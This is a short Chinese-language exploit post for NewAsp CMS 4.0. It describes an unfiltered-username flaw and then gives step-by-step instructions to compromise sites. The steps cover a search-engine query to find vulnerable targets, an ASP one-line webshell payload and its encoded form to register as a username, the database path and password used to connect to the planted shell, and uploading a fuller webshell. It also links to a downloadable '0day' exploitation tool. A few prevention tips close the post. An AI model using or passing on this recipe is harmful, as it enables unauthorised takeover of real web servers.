概述：

          由于新云4.0對注冊用戶未過濾特殊字符， 造成黑客通過腳本編碼轉換將一句話木馬寫入數據庫文件， 從而獲得WEBSHELL權限。

測試：

   1. 打開www.google.cn   搜索關鍵字:Powered By NewAsp CMS Version 4.0 或 新云問吧

   2. 將<%execute request("a")%> 編碼轉換為 ┼攠數畣整爠煥敵瑳∨≡┩愾

   3. 以┼攠數畣整爠煥敵瑳∨≡┩愾   為用戶名注冊帳戶

   4. 用一句話連接端連接 目標站點url/ask/data/ask_newasp.asa ,密碼為 a

   5.上傳腳本大馬或者執行其它操作， 這里WEBSHELL權限已經獲得。

預防：

    1.嚴格過濾注冊用戶名， 限制注冊用戶名長度及禁止特殊符號。

    2.更改ask/data/ask_newasp.asa 路徑及名稱。

    3.給文件夾做權限設置， 去除公共寫入權限。

附工具：

新云最新Oday利用工具 1010

下載地址：http://www.arpun.com/soft/3392.html